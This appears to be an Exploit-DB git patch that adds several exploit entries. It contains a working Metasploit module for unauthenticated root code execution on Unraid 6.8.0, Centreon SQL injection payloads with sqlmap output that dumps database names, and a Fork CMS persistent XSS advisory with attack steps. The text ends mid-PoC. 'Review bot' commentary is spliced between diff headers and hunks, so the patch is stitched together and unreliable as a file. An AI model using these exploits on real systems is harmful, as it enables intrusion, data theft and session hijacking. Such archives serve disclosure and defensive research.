From 01900f216d27957107cc84a3fcbd5f5a6a28b735 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 21 Apr 2020 05:01:47 +0000
Subject: [PATCH] DB: 2020-04-21

7 changes to exploits/shellcodes

Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)
Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))
Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)
Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path
Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)
Centreon 19.10.5 - 'id' SQL Injection
Fork CMS 5.8.0 - Persistent Cross-Site Scripting
---
 exploits/linux/remote/48353.rb | 101 +++++++
 exploits/php/webapps/48345.txt | 69 +++++
 exploits/php/webapps/48348.txt | 491 +++++++++++++++++++++++++++++++
 exploits/windows/local/48346.py | 97 ++++++
 exploits/windows/local/48350.py | 108 +++++++
 exploits/windows/local/48351.py | 54 ++++
 exploits/windows/local/48352.txt | 28 ++
 files_exploits.csv | 7 +
 8 files changed, 955 insertions(+)
 create mode 100755 exploits/linux/remote/48353.rb
 create mode 100644 exploits/php/webapps/48345.txt
 create mode 100644 exploits/php/webapps/48348.txt
 create mode 100755 exploits/windows/local/48346.py
 create mode 100755 exploits/windows/local/48350.py
 create mode 100755 exploits/windows/local/48351.py
 create mode 100644 exploits/windows/local/48352.txt

diff --git a/exploits/linux/remote/48353.rb b/exploits/linux/remote/48353.rb
new file mode 100755
index 000000000..55f048b35
--- /dev/null
+++ b/exploits/linux/remote/48353.rb
@@ -0,0 +1,101 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::PhpEXE
+
+ Rank = ExcellentRanking
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution',
+ 'Description' => %q{
+ This module exploits two vulnerabilities affecting Unraid 6.8.0.
+ An authentication bypass is used to gain access to the administrative
+ interface, and an insecure use of the extract PHP function can be abused
+ for arbitrary code execution as root.
+ },
+ 'Author' =>
+ [
+ 'Nicolas CHATELAIN '
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2020-5847' ],
+ [ 'CVE', '2020-5849' ],
+ [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ],
+ [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ]
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['php'],
+ 'Privileged' => true,
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ [ 'Automatic', {}]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Feb 10 2020'
+ )
+ )
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/'])
+ ]
+ )
+ end
+
+ def check
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
+ 'method' => 'GET'
+ )
+
+ unless res
+ return CheckCode::Unknown('Connection failed')
+ end
+
+ unless res.code == 200
+ return CheckCode::Safe('Unexpected reply')
+ end
+
+ /\sVersion:\s(?[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2}) / =~ res.body
+
+ if version && Gem::Version.new(version) == Gem::Version.new('6.8.0')
+ return CheckCode::Appears("Unraid version #{version} appears to be vulnerable")
+ end
+
+ CheckCode::Safe
+ end
+
+ def exploit
+ begin
+ vprint_status('Sending exploit code')
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
+ 'method' => 'GET',
+ 'encode_params' => false,
+ 'vars_get' =>
+ {
+ 'path' => 'x',
+ 'site[x][text]' => Rex::Text.uri_encode("", 'hex-normal')
+ }
+ )
+
+ if res.nil?
+ print_good('Request timed out, OK if running a non-forking/blocking payload...')
+ elsif res.code == 302
+ fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.')
+ else
+ print_warning("Unexpected response code #{res.code}, please check your payload.")
+ end
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+ end
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/48345.txt b/exploits/php/webapps/48345.txt
new file mode 100644
index 000000000..6a9c7ba07
--- /dev/null
+++ b/exploits/php/webapps/48345.txt
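Review bot: In `check`, a 200 response whose body carries no `Version:` string falls through to the final `CheckCode::Safe`, so a host that merely could not be fingerprinted is reported as not vulnerable; a guard such as `return CheckCode::Detected('Unraid web interface found, but no version string in the response') unless version` placed before that fallback keeps the verdict honest. `check` also has no `rescue ::Rex::ConnectionError` while `exploit` does, so the two methods treat an unreachable host differently (the framework's check runner may catch it, but the module's own handling is then inconsistent). As a point of style, the `unless res ... end` and `unless res.code == 200 ... end` blocks read better as modifier guards, e.g. `return CheckCode::Unknown('Connection failed') unless res`. Several tokens in this hunk (the author e-mail, the named capture in the version regex, the first argument to `Rex::Text.uri_encode`) look as if angle-bracketed text was lost when the page was rendered, so those lines should be compared with the original file rather than treated as defects.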
@@ -0,0 +1,69 @@
+# Exploit Title: Centreon 19.10.5 - 'id' SQL Injection
+# Date: 2020-04-19
+# Exploit Author: Basim alabdullah
+# Vendor Homepage: https://www.centreon.com
+# Software Link: https://download.centreon.com/
+# Version: v.19.10.5
+# Tested on: Centos 5
+
+
+[EXECUTIVE SUMMARY]
+
+ Centreon has come a long way from its early roots. A user-friendly monitoring console on Nagios before, Centreon is today, a rich monitoring platform powered by Centreon Engine, Centreon Broker and Centreon Web.
+
+ Monitoring-savvy IT practitioners who want Nagios-inspired flexibility without its complexity, easily embrace Centreon for robust infrastructure systems and network performance monitoring.
+ Downloaded by hundreds and thousands of IT professionals worldwide.
+ The analysis discovered a time-based blind SQL
+ injection vulnerability in the tracker functionality of
+ Centreon Monitoring software. A malicious user can inject arbitrary
+ SQL commands to the application. The vulnerability lies in the project tracker
+ service search functionality; depending on project visibility successful
+ exploitation may require user authentication. A successful attack
+ can read, modify or delete data from the database or execute arbitrary commands on the underlying system.
+
+[VULNERABLE VERSIONS]
+
+ The following version of the Centreon Monitoring was affected by the
+ vulnerability; previous versions may be vulnerable as well:
+ - Centreon version 19.10.5
+
+
+[Proof of Concept]
+
+ http://TARGET/centreon/include/monitoring/acknowlegement/xml/broker/makeXMLForAck.php?hid=15&svc_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7176706b71%2C%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%2C0x716b716b71%29%2CNULL%2CNULL%23
+
+
+ [Payloads]
+
+ Parameter: svc_id (GET)
+ Type: boolean-based blind
+ Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+ Payload: hid=15&svc_id=1 OR NOT 5782=5782
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: hid=15&svc_id=1 AND (SELECT 1615 FROM (SELECT(SLEEP(5)))TRPy)
+
+ Type: UNION query
+ Title: MySQL UNION query (NULL) - 5 columns
+ Payload: hid=15&svc_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x724b66756a476759544f48716d61496b5a68754a4c6f42634e6e775272724c44616e567355527a6f,0x716b716b71),NULL,NULL#
+---
+[12:24:35] [INFO] testing MySQL
+[12:24:35] [INFO] confirming MySQL
+[12:24:35] [INFO] the back-end DBMS is MySQL
+[12:24:35] [INFO] fetching banner
+web server operating system: Linux Red Hat
+web application technology: Apache 2.4.34, PHP 7.2.24
+back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
+banner: '10.1.38-MariaDB'
+[12:24:35] [INFO] fetching database names
+[12:24:35] [INFO] starting 4 threads
+[12:24:35] [INFO] resumed: 'centreon'
+[12:24:35] [INFO] resumed: 'test'
+[12:24:35] [INFO] resumed: 'centreon_storage'
+[12:24:35] [INFO] resumed: 'information_schema'
+available databases [4]:
+[*] centreon
+[*] centreon_storage
+[*] information_schema
+[*] test
\ No newline at end of file
diff --git a/exploits/php/webapps/48348.txt b/exploits/php/webapps/48348.txt
new file mode 100644
index 000000000..64d991ee6
--- /dev/null
+++ b/exploits/php/webapps/48348.txt
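Review bot: The header `# Exploit Title: Centreon 19.10.5 - 'id' SQL Injection` and the executive summary ("tracker functionality", "project tracker service search functionality") do not match the proof of concept, which exercises only the `svc_id` GET parameter of `include/monitoring/acknowlegement/xml/broker/makeXMLForAck.php`; no `id` parameter appears in any listed payload. The summary also describes a single time-based blind issue while the payload list shows boolean-based, time-based and UNION variants, and the claim that a successful attack can "execute arbitrary commands on the underlying system" is not demonstrated by the output shown. The title, summary and named parameter should be reconciled with the PoC so that anyone assessing exposure or writing a detection rule keys on the parameter and endpoint actually exercised.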
@@ -0,0 +1,491 @@
+# Title: Fork CMS 5.8.0 - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Vendor: https://www.fork-cms.com/download
+# Software Link: https://github.com/forkcms/forkcms/pull/3073
+# CVE: N/A
+
+Document Title:
+===============
+Fork CMS v5.8.0 - Multiple Persistent Web Vulnerbilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2208
+
+ID (3073): https://github.com/forkcms/forkcms/pull/3073
+
+
+Release Date:
+=============
+2020-04-17
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2208
+
+
+Common Vulnerability Scoring System:
+====================================
+5.3
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Fork is an easy to use open source CMS using Symfony Components. Fork
+CMS is dedicated to creating a user friendly environment
+to build, monitor and
+update your website. We take great pride in being the Content Management
+System of choice for beginners and professionals.
+
+(Copy of the Homepage: https://www.fork-cms.com &
+https://www.fork-cms.com/download )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple
+persistent web vulnerabilities in the official Fork CMS v5.8.0.
+
+
+Affected Product(s):
+====================
+ForkCMS
+Product: Fork CMS v5.8.0 - Content Management System (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-17: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted authentication (user/moderator) - User privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+Multiple persistent input validation web vulnerabilities has been
+discovered in the official Fork CMS v5.8.0 open-source web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise browser to
+web-application requests from the application-side.
+
+The persistent input validation web vulnerabilities are located in the
+`Displayname` input field when using the `Add`, `Edit` or `Register`
+mechanism that forwards the information into the `var` parameter. Remote
+attackers and privileged application user accounts are able to
+inject own malicious persistent script code as the users displayname by
+usage of the registration module (/profiles/register). Privileged
+users with access to the profile or users module are able to exploit the
+issue by a simple inject. The displayname then becomes visible in
+the Admin - Profiles Index on Preview, Edit User/Profile, Delete User
+Interaction and User Index in Listing modules. the var parameter
+does not encode or parse the exisiting injected content and executes it.
+The request method to inject is POST and the attack vector of the
+vulnerability is located on the application-side of the content
+management system. The injection point is located in the registration form
+and the add/edit user function. The execution point of the issue occurs
+in the preview profile, edit user, user index listing and delete
+user message context.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent external redirects to
+malicious source and persistent manipulation of affected application
+modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Register
+[+] Add User
+[+] Edit User
+
+Vulnerable Input(s):
+[+] Displayname
+
+Vulnerable Parameter(s):
+[+] var
+
+Affected Module(s):
+[+] Preview Profile
+[+] Edit User
+[+] User Index
+[+] Delete User
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerabilities can be exploited by
+remote attackers with low privileged user account and low user interaction.
+For security demonstration or to reproduce the security vulnerability
+follow the provided information an steüs below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the fork cms web-application newst version
+2. Move via sitemap or by link to the registration page
+(/modules/profiles/register)
+3. Inject your script code payload html/js to the Displayname input field
+4. Register the account by pushing submit
+5. Activate the link in the account registration email
+Note: Now simple wait until the administrator / privileged user visits
+the panel to execute the code on interaction or preview only
+6. Successful reproduce of the persistent script code injection
+vulnerability!
+
+
+PoC: Vulnerable Source (User Index in Listing -
+https://fork-cms.localhost:8080/private/en/users/index)
+
+test3">